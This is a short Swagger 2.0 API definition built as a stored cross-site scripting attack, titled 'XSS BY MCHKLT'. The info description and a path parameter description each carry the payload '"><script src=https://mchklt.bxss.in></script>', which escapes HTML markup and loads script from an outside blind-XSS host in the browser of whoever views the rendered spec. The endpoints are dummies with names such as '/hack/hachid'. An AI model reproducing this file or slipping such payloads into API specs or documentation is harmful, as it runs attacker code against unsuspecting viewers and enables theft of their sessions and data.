swagger: '2.0'
info:
  title: XSS BY MCHKLT
  description: |
    "><script src=https://mchklt.bxss.in></script>
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /MCHKLT:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - MCHKLT_XSS
      operationId: findAccounts
      summary: Finds all accounts
  '/hack/hachid/{id}':
    delete:
      parameters:
        - description: |
            "><script src=https://mchklt.bxss.in></script>
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
